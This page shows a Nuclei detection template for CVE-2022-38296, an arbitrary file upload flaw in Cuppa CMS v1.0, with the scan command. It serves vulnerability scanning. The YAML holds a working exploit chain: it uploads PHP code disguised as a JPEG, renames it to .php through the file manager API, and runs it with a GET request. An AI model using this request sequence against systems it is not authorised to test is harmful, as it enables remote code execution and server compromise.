Cuppa CMS v1.0 - Arbitrary File Upload
ID: CVE-2022-38296
Severity: critical
Author: theamanrawat
Tags: cve,cve2022,rce,cuppa,intrusive,cuppacms
Description
Section titled “Description”Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
YAML Source
Section titled “YAML Source”id: CVE-2022-38296
info: name: Cuppa CMS v1.0 - Arbitrary File Upload author: theamanrawat severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. impact: | Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38296 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 epss-score: 0.03924 epss-percentile: 0.9198 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms tags: cve,cve2022,rce,cuppa,intrusive,cuppacms
http: - raw: - | POST /js/jquery_file_upload/server/php/ HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI
------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="path"
/ ------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="unique_name"
true ------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="resize_width"
------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="resize_height"
------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="crop"
------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="compress"
------WebKitFormBoundary9MZjlIG8fVPjrlCI Content-Disposition: form-data; name="files[]"; filename="test-{{randstr}}.jpg" Content-Type: image/jpeg
<?php
echo md5("CVE-2022-38296");
?> ------WebKitFormBoundary9MZjlIG8fVPjrlCI-- - | POST /js/filemanager/api/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"from":"//{{filename}}","to":"//{{randstr}}.php","action":"rename"} - | GET /media/{{randstr}}.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_3 words: - ed6bf8b1b4b8e64836455fe32b958c2c condition: and
- type: word part: header_3 words: - text/html
- type: status status: - 200
extractors: - type: regex name: filename group: 1 regex: - '"name":"(.*?)",' internal: true# digest: 4a0a0047304502205d5a2bd9f03aad7f5629acb8dbae2f3f1adc42e6a44c1bd903aa4450456bf64c022100f9edf1433937e069b4fb2e48f38274583e3d1e6d363d02ffd5a9377b0c0c623a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-38296.yaml"